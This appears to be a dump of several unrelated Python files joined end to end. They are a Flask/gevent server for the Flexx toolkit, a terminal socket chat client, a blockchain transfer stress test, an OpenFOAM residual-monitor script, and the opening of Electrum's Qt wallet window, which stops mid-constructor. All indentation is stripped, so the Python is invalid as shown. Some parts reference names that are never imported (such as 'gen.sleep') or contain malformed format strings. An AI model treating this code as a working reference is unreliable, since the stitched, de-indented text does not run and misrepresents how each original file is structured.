# 2) manager should be overloadable from _flaskserver.py to allow MainHandler,
# AppHandler and WSHandler to place manager tasks in the flexx app loop
# 3) The specification of the backend should be passed at run or start. Not at launch or before.
import json
import time
import asyncio
import socket
import mimetypes
import threading
from urllib.parse import urlparse
import flask
from flask import Flask, request, Blueprint, current_app, url_for
from flask_sockets import Sockets
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from ._app import manager
from ._session import get_page
from ._server import AbstractServer
from ._assetstore import assets
from ._clientcore import serializer
from ._flaskhelpers import register_blueprints, flexxBlueprint, flexxWS
from . import logger
from .. import config
app = Flask(__name__)
# app.debug = True
@app.route('/favicon.ico')
def favicon():
return '' # app.send_static_file(f'img/favicon.ico')
if app.debug:
def has_no_empty_params(rule):
defaults = rule.defaults if rule.defaults is not None else ()
arguments = rule.arguments if rule.arguments is not None else ()
return len(defaults) >= len(arguments)
@app.route("/site-map")
def site_map():
links = []
for rule in current_app.url_map.iter_rules():
# Filter out rules we can't navigate to in a browser
# and rules that require parameters
if "GET" in rule.methods and has_no_empty_params(rule):
url = url_for(rule.endpoint, **(rule.defaults or {}))
links.append((url, rule.endpoint))
# links is now a list of url, endpoint tuples
html = ["<h> URLs served by this server </h>", "<ul>"]
for link in links:
html.append(f'<li><a href="{link[0]}">{link[1]}</a></li>')
html.append("</ul>")
return '\n'.join(html)
@flexxWS.route('/ws/<path:path>')
def ws_handler(ws, path):
# WSHandler
wshandler = WSHandler(ws)
async def flexx_msg_handler(ws, path):
wshandler.open(path)
future = asyncio.run_coroutine_threadsafe(flexx_msg_handler(ws, path), loop=manager.loop)
future.result()
while not ws.closed:
message = ws.receive()
if message is None:
break
manager.loop.call_soon_threadsafe(wshandler.on_message, message)
manager.loop.call_soon_threadsafe(wshandler.ws_closed)
@flexxBlueprint.route('/', defaults={'path': ''})
@flexxBlueprint.route('/<path:path>')
def flexx_handler(path):
# if path.startswith('assets'):
# path = f"flexx/{path}"
# MainHandler
return MainHandler(flask.request).run()
IMPORT_TIME = time.time()
def is_main_thread():
""" Get whether this is the main thread. """
return isinstance(threading.current_thread(), threading._MainThread)
class FlaskServer(AbstractServer):
""" Flexx Server implemented in Flask.
"""
def __init__(self, *args, **kwargs):
global app
self._app = app
self._server = None
self._serving = None # needed for AbstractServer
super().__init__(*args, **kwargs) # this calls self._open and
# create the loop if not specified
def _open(self, host, port, **kwargs):
# Note: does not get called if host is False. That way we can
# run Flexx in e.g. JLab's application.
# Start server (find free port number if port not given)
if port:
# Turn port into int, use hashed port number if a string was given
try:
port = int(port)
except ValueError:
port = port_hash(port)
else:
# Try N ports in a repeatable range (easier, browser history, etc.)
a_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
prefered_port = port_hash('Flexx')
for i in range(8):
port = prefered_port + i
try:
result_of_check = a_socket.bind((host, port))
except:
continue
a_socket.close()
break
else:
assert False, "No port found to start flask"
# Keep flask application info
self._serving = (host, port)
# Remember the loop we are in for the manager
manager.loop = self._loop
# Create a thread frendly coroutine (especially for python 3.8)
asyncio.run_coroutine_threadsafe(self._thread_switch(), self._loop)
@staticmethod
async def _thread_switch():
"""
Python 3.8 is very unfrendly to thread as it does not leave any chances for
a Thread switch when no tasks are left to run. This function just let other
Threads some time to run.
"""
while True:
time.sleep(0)
await asyncio.sleep(1e-9) # any number above 0 will keep low CPU usage
def start(self):
# Register blueprints for all apps:
sockets = Sockets(app)
register_blueprints(self._app, sockets)
# Start flask application in background thread
def RunServer():
self._server = pywsgi.WSGIServer(self._serving, self._app, handler_class=WebSocketHandler)
proto = self.protocol
# This string 'Serving apps at' is our 'ready' signal and is tested for.
logger.info('Serving apps at %s://%s:%i/' % (proto, *self._serving))
self._server.serve_forever()
_thread = threading.Thread(target=RunServer)
_thread.daemon = True # end the thread if the main thread exits
_thread.start()
super().start()
def start_serverless(self):
super().start()
def _close(self):
self._server.stop()
@property
def app(self):
""" The Flask Application object being used."""
return self._app
@property
def server(self):
""" The Flask HttpServer object being used."""
return self._server
@property
def protocol(self):
""" Get a string representing served protocol."""
# if self._server.ssl_options is not None:
# return 'https'
return 'http'
def port_hash(name):
""" Given a string, returns a port number between 49152 and 65535
This range (of 2**14 posibilities) is the range for dynamic and/or
private ports (ephemeral ports) specified by iana.org. The algorithm
is deterministic.
"""
fac = 0xd2d84a61
val = 0
for c in name:
val += (val >> 3) + (ord(c) * fac)
val += (val >> 3) + (len(name) * fac)
return 49152 + (val % 2 ** 14)
class RequestHandler:
def __init__(self, request):
self.request = request
self.content = []
self.values = {}
def redirect(self, location):
return flask.redirect(location)
def write(self, string_or_bytes):
self.content = string_or_bytes
def send_error(self, error_no):
return "Error", error_no
def run(self):
if self.request.method == 'GET':
ret = self.get(request.path)
if ret is not None:
return ret
else:
return self.content, 200, self.values
def get_argument(self, key, default):
return self.request.values.get(key, default)
def set_header(self, key, value):
self.values[key] = value
class AppHandler(RequestHandler):
""" Handler for http requests to get apps.
"""
def get(self, full_path):
logger.debug('Incoming request at %r' % full_path)
ok_app_names = '__main__', '__default__', '__index__'
parts = [p for p in full_path.split('/') if p]
# Try getting regular app name
# Note: invalid part[0] can mean its a path relative to the main app
app_name = None
path = '/'.join(parts)
if parts:
if path.lower() == 'flexx': # reserved, redirect to other handler
return self.redirect('/flexx/')
if parts[0] in ok_app_names or manager.has_app_name(parts[0]):
app_name = parts[0]
path = '/'.join(parts[1:])
# If it does not look like an app, it might be that the request is for
# the main app. The main app can have sub-paths, but lets try to filter
# out cases that might make Flexx unnecessarily instantiate an app.
# In particular "favicon.ico" that browsers request by default (#385).
if app_name is None:
if len(parts) == 1 and '.' in full_path:
return self.redirect('/flexx/data/' + full_path)
# If we did not return ... assume this is the default app
app_name = '__main__'
# Try harder to produce an app
if app_name == '__main__':
app_name = manager.has_app_name('__main__')
elif '/' not in full_path:
return self.redirect('/%s/' % app_name) # ensure slash behind name
# Maybe the user wants an index? Otherwise error.
if not app_name:
if not parts:
app_name = '__index__'
else:
name = parts[0] if parts else '__main__'
self.write('No app "%s" is currently hosted.' % name)
# We now have:
# * app_name: name of the app, must be a valid identifier, names
# with underscores are reserved for special things like assets,
# commands, etc.
# * path: part (possibly with slashes) after app_name
if app_name == '__index__':
return self._get_index(app_name, path) # Index page
else:
return self._get_app(app_name, path) # An actual app!
def _get_index(self, app_name, path):
if path:
return self.redirect('/flexx/__index__')
all_apps = ['<li><a href="%s/">%s</a></li>' % (name, name) for name in
manager.get_app_names()]
the_list = '<ul>%s</ul>' % ''.join(all_apps) if all_apps else 'no apps'
self.write('Index of available apps: ' + the_list)
def _get_app(self, app_name, path):
# Allow serving data/assets relative to app so that data can use
# relative paths just like exported apps.
if path.startswith(('flexx/data/', 'flexx/assets/')):
return self.redirect('/' + path)
# Get case-corrected app name if the app is known
correct_app_name = manager.has_app_name(app_name)
# Error or redirect if app name is not right
if not correct_app_name:
self.write('No app "%s" is currently hosted.' % app_name)
if correct_app_name != app_name:
return self.redirect('/%s/%s' % (correct_app_name, path))
# Should we bind this app instance to a pre-created session?
session_id = self.get_argument('session_id', '')
if session_id:
# If session_id matches a pending app, use that session
session = manager.get_session_by_id(session_id)
if session and session.status == session.STATUS.PENDING:
self.write(get_page(session).encode())
else:
self.redirect('/%s/' % app_name) # redirect for normal serve
else:
# Create session - websocket will connect to it via session_id
async def run_in_flexx_loop(app_name, request):
session = manager.create_session(app_name, request=request)
return session
future = asyncio.run_coroutine_threadsafe(run_in_flexx_loop(app_name, request=self.request), loop=manager.loop)
session = future.result()
self.write(get_page(session).encode())
class MainHandler(RequestHandler):
""" Handler for assets, commands, etc. Basically, everything for
which the path is clear.
"""
def _guess_mime_type(self, fname):
""" Set the mimetype if we can guess it from the filename.
"""
guess = mimetypes.guess_type(fname)[0]
if guess:
self.set_header("Content-Type", guess)
def get(self, full_path):
logger.debug('Incoming request at %s' % full_path)
# Analyze path to derive components
# Note: invalid app name can mean its a path relative to the main app
parts = [p for p in full_path.split('/') if p][1:]
if not parts:
self.write('Root url for flexx, missing selector: assets, assetview, data, info or cmd')
return
selector = parts[0]
path = '/'.join(parts[1:])
if selector in ('assets', 'assetview', 'data'):
self._get_asset(selector, path) # JS, CSS, or data
elif selector == 'info':
self._get_info(selector, path)
elif selector == 'cmd':
self._get_cmd(selector, path) # Execute (or ignore) command
else:
self.write('Invalid url path "%s".' % full_path)
def _get_asset(self, selector, path):
# Get session id and filename
session_id, _, filename = path.partition('/')
session_id = '' if session_id == 'shared' else session_id
# Get asset provider: store or session
asset_provider = assets
if session_id and selector != 'data':
self.write('Only supports shared assets, not ' % filename)
elif session_id:
asset_provider = manager.get_session_by_id(session_id)
# Checks
if asset_provider is None:
self.write('Invalid session %r' % session_id)
if not filename:
self.write('Root dir for %s/%s' % (selector, path))
if selector == 'assets':
# If colon: request for a view of an asset at a certain line
if '.js:' in filename or '.css:' in filename or filename[0] == ':':
fname, where = filename.split(':')[:2]
return self.redirect('/flexx/assetview/%s/%s#L%s' %
(session_id or 'shared', fname.replace('/:', ':'), where))
# Retrieve asset
try:
res = asset_provider.get_asset(filename)
except KeyError:
self.write('Could not load asset %r' % filename)
else:
self._guess_mime_type(filename)
self.write(res.to_string())
elif selector == 'assetview':
# Retrieve asset
try:
res = asset_provider.get_asset(filename)
except KeyError:
self.write('Could not load asset %r' % filename)
else:
res = res.to_string()
# Build HTML page
style = ('pre {display:block; width: 100%; padding:0; margin:0;} '
'a {text-decoration: none; color: #000; background: #ddd;} '
':target {background:#ada;} ')
lines = ['<html><head><style>%s</style></head><body>' % style]
for i, line in enumerate(res.splitlines()):
table = {ord('&'): '&', ord('<'): '<', ord('>'): '>'}
line = line.translate(table).replace('\t', ' ')
lines.append('<pre id="L%i"><a href="#L%i">%s</a> %s</pre>' %
(i + 1, i + 1, str(i + 1).rjust(4).replace(' ', ' '), line))
lines.append('</body></html>')
self.write('\n'.join(lines))
elif selector == 'data':
# todo: can/do we async write in case the data is large?
# Retrieve data
res = asset_provider.get_data(filename)
if res is None:
return self.send_error(404)
else:
self._guess_mime_type(filename) # so that images show up
self.write(res)
else:
raise RuntimeError('Invalid asset type %r' % selector)
def _get_info(self, selector, info):
""" Provide some rudimentary information about the server.
Note that this is publicly accesible.
"""
runtime = time.time() - IMPORT_TIME
napps = len(manager.get_app_names())
nsessions = sum([len(manager.get_connections(x))
for x in manager.get_app_names()])
info = []
info.append('Runtime: %1.1f s' % runtime)
info.append('Number of apps: %i' % napps)
info.append('Number of sessions: %i' % nsessions)
info = '\n'.join(['<li>%s</li>' % i for i in info])
self.write('<ul>' + info + '</ul>')
def _get_cmd(self, selector, path):
""" Allow control of the server using http, but only from localhost!
"""
if not self.request.host.startswith('localhost:'):
self.write('403')
return
if not path:
self.write('No command given')
elif path == 'info':
info = dict(address=self.application._flexx_serving,
app_names=manager.get_app_names(),
nsessions=sum([len(manager.get_connections(x))
for x in manager.get_app_names()]),
)
self.write(json.dumps(info))
elif path == 'stop':
asyncio.get_event_loop().stop()
# loop = IOLoop.current()
# loop.add_callback(loop.stop)
self.write("Stopping event loop.")
else:
self.write('unknown command %r' % path)
class MessageCounter:
""" Simple class to count incoming messages and periodically log
the number of messages per second.
"""
def __init__(self):
self._collect_interval = 0.2 # period over which to collect messages
self._notify_interval = 3.0 # period on which to log the mps
self._window_interval = 4.0 # size of sliding window
self._mps = [(time.time(), 0)] # tuples of (time, count)
self._collect_count = 0
self._collect_stoptime = 0
self._stop = False
self._notify()
def trigger(self):
t = time.time()
if t < self._collect_stoptime:
self._collect_count += 1
else:
self._mps.append((self._collect_stoptime, self._collect_count))
self._collect_count = 1
self._collect_stoptime = t + self._collect_interval
def _notify(self):
mintime = time.time() - self._window_interval
self._mps = [x for x in self._mps if x[0] > mintime]
if self._mps:
n = sum([x[1] for x in self._mps])
T = self._mps[-1][0] - self._mps[0][0] + self._collect_interval
else:
n, T = 0, self._collect_interval
logger.debug('Websocket messages per second: %1.1f' % (n / T))
if not self._stop:
loop = asyncio.get_event_loop()
loop.call_later(self._notify_interval, self._notify)
def stop(self):
self._stop = True
from typing import (
TYPE_CHECKING,
cast,
Any,
Optional,
Dict,
Union,
List,
Awaitable,
Callable,
Tuple,
Type,
)
class MyWebSocketHandler():
"""
This class is designed to mimic the tornado WebSocketHandler to
allow glue in code from WSHandler.
"""
class Application:
pass
class IOLoop:
def __init__(self, loop):
self._loop = loop
def spawn_callback(self, func, *args):
self._loop.call_soon_threadsafe(func, *args)
def __init__(self, ws):
self._ws = ws
self.application = MyWebSocketHandler.Application()
self.application._io_loop = MyWebSocketHandler.IOLoop(manager.loop)
self.cookies = {}
def write_message(
self, message: Union[bytes, str, Dict[str, Any]], binary: bool=False
) -> "Future[None]":
self._ws.send(message)
def close(self, code: int=None, reason: str=None) -> None:
if not self._ws.closed:
self._ws.close(code, reason)
def ws_closed(self):
self.on_close()
class WSHandler(MyWebSocketHandler):
""" Handler for websocket.
"""
# https://tools.ietf.org/html/rfc6455#section-7.4.1
known_reasons = {1000: 'client done',
1001: 'client closed',
1002: 'protocol error',
1003: 'could not accept data',
}
# --- callbacks
def open(self, path=None):
""" Called when a new connection is made.
"""
if not hasattr(self, 'close_code'): # old version of Flask?
self.close_code, self.close_reason = None, None
self._session = None
self._mps_counter = MessageCounter()
if isinstance(path, bytes):
path = path.decode()
self.app_name = path.strip('/')
logger.debug('New websocket connection %s' % path)
if manager.has_app_name(self.app_name):
self.application._io_loop.spawn_callback(self.pinger1)
else:
self.close(1003, "Could not associate socket with an app.")
# todo: @gen.coroutine?
def on_message(self, message):
""" Called when a new message is received from JS.
This handles one message per event loop iteration.
We now have a very basic protocol for receiving messages,
we should at some point define a real formalized protocol.
"""
self._mps_counter.trigger()
try:
command = serializer.decode(message)
except Exception as err:
err.skip_tb = 1
logger.exception(err)
self._pongtime = time.time()
if self._session is None:
if command[0] == 'HI_FLEXX':
session_id = command[1]
try:
self._session = manager.connect_client(self, self.app_name,
session_id,
cookies=self.cookies)
except Exception as err:
self.close(1003, "Could not launch app: %r" % err)
raise
else:
try:
self._session._receive_command(command)
except Exception as err:
err.skip_tb = 1
logger.exception(err)
def on_close(self):
""" Called when the connection is closed.
"""
self.close_code = code = self.close_code or 0
reason = self.close_reason or self.known_reasons.get(code, '')
logger.debug('Websocket closed: %s (%i)' % (reason, code))
self._mps_counter.stop()
if self._session is not None:
manager.disconnect_client(self._session)
self._session = None # Allow cleaning up
def pinger1(self):
""" Check for timeouts. This helps remove lingering false connections.
This uses the websocket's native ping-ping mechanism. On the
browser side, pongs work even if JS is busy. On the Python side
we perform a check whether we were really waiting or whether Python
was too busy to detect the pong.
"""
self._pongtime = time.time()
self._pingtime = pingtime = 0
while self.close_code is None:
dt = config.ws_timeout
# Ping, but don't spam
if pingtime <= self._pongtime:
self.ping(b'x')
pingtime = self._pingtime = time.time()
iters_since_ping = 0
yield gen.sleep(dt / 5)
# Check pong status
iters_since_ping += 1
if iters_since_ping < 5:
pass # we might have missed the pong
elif time.time() - self._pongtime > dt:
# Delay is so big that connection probably dropped.
# Note that a browser sends a pong even if JS is busy
logger.warning('Closing connection due to lack of pong')
self.close(1000, 'Conection timed out (no pong).')
return
def on_pong(self, data):
""" Implement the ws's on_pong() method. Called when our ping
is returned by the browser.
"""
self._pongtime = time.time()
# --- methods
def write_command(self, cmd):
assert isinstance(cmd, tuple) and len(cmd) >= 1
bb = serializer.encode(cmd)
try:
self.write_message(bb, binary=True)
except WebSocketClosedError:
self.close(1000, 'closed by client')
def close(self, *args):
super().close(*args)
def close_this(self):
""" Call this to close the websocket
"""
self.close(1000, 'closed by server')
def check_origin(self, origin):
""" Handle cross-domain access; override default same origin policy.
"""
# http://www.tornadoweb.org/en/stable/_modules/tornado/websocket.html
# WebSocketHandler.check_origin
serving_host = self.request.headers.get("Host")
serving_hostname, _, serving_port = serving_host.partition(':')
connecting_host = urlparse(origin).netloc
connecting_hostname, _, connecting_port = connecting_host.partition(':')
serving_port = serving_port or '80'
connecting_port = connecting_port or '80'
if serving_hostname == 'localhost':
return True # Safe
elif serving_host == connecting_host:
return True # Passed most strict test, hooray!
elif serving_hostname == '0.0.0.0' and serving_port == connecting_port:
return True # host on all addressses; best we can do is check port
elif connecting_host in config.host_whitelist:
return True
else:
logger.warning('Connection refused from %s' % origin)
return False
|
cclient.py
|
import socket,threading,requests,os,json,re
os.system("clear")
port = 2230
unms = raw_input("Name : ")
R = "\x1b[1;31m"
G = "\x1b[1;32m"
Y = "\x1b[1;33m"
B = "\x1b[1;34m"
P = "\x1b[1;35m"
C = "\x1b[1;36m"
W = "\x1b[1;37m"
def tjs(msg,to="public"):
return json.dumps({"msg":msg,"to":to})
class client:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect (("127.0.0.1", port))
print port
s.send(unms)
except socket.error:
exit("Server Error")
def sendmsg(self):
while True:
ab = raw_input(B)
if ab.startswith("!"):
if ab.startswith("!msg "):
fo = re.search("!msg (.*?) (.*)",ab)
to,msg = fo.group(1),fo.group(2)
self.s.send(tjs(msg,to))
continue
else:
self.s.send(tjs(ab,"system"))
continue
self.s.send(tjs(ab))
def __init__(self):
iThread = threading.Thread(target=self.sendmsg)
iThread.daemon = True
iThread.start()
while True:
data = self.s.recv(1024)
if not data:
print ("Server Error")
exit()
jdata = json.loads(data)
print (W+"[{}][{}] : {}".format(R+jdata["from"]+W if jdata["from"] == "system" else P+jdata["from"]+W,Y+"PUBLIC"+W if not jdata["is_private"] else G+"PRIVATE"+W,C+jdata["msg"]+W))
client = client()
client.sendmsg()
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eosio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="eonio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission eonio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
monitor.py
|
import sys
sys.path.append(r"/home/anoldfriend/OpenFOAM/anoldfriend-7/utilities/")
import signal
import multiprocessing as mp
import time
from residual_monitor import read_residuals,plot_multiple_residuals,quit
log="run.log"
pressure_name="p_rgh"
nCorrectors=1
interval=10
sample_size=300
# m_residuals=[["h"],["Ux","Uy",pressure_name]]
# m_residuals=[["h"],["Ux",pressure_name]]
m_residuals=[["h","CO2","O2"]]
m_thresholds=[[1e-1,1e-4,1e-5,1e-6,1e-7]]
m_save_files=["residuals1.jpg"]
def process_fun():
line_offset=0
iterations_offset=0
while True:
df,line_offset,iterations,info=read_residuals(log,line_offset,pressure_name,nCorrectors,sample_size)
if "cum_physical_time" in info.keys():
physical_time=info["cum_physical_time"]
else:
physical_time="not found"
if "cum_execution_time" in info.keys():
execution_time=info["cum_execution_time"]
else:
execution_time="not found"
title=f"physical time : {physical_time} s, execution time : {execution_time} s"
titles=[title]*len(m_residuals)
if "latest_delta_time" in info.keys():
delta_time=info["latest_delta_time"]
else:
delta_time= "not found"
if "maxCo" in info.keys():
maxCo=info["maxCo"]
else:
maxCo="not found"
if "meanCo" in info.keys():
meanCo=info["meanCo"]
else:
meanCo="not found"
text=f"latest_delta_time: {delta_time} s \n" + \
f"mean CFL num: {meanCo}\n" + \
f"max CFL num: {maxCo}"
texts=[text]*len(m_residuals)
plot_multiple_residuals(df,iterations_offset,m_residuals,m_thresholds,titles,texts,m_save_files)
iterations_offset+=iterations
time.sleep(interval)
if __name__=="__main__":
try:
signal.signal(signal.SIGINT,quit)
signal.signal(signal.SIGTERM,quit)
p=mp.Process(target=process_fun)
p.start()
p.deamon=True
while True:
pass
except Exception as err:
print(f"Error Message: {err}")
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, InvoiceError)
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum.lnutil import PaymentFailure, SENT, RECEIVED
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.util import PR_PAID, PR_UNPAID, PR_INFLIGHT, PR_FAILED
from electrum.util import pr_expiration_values
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.send_tab_is_onchain = False
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
if self.wallet.has_lightning():
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
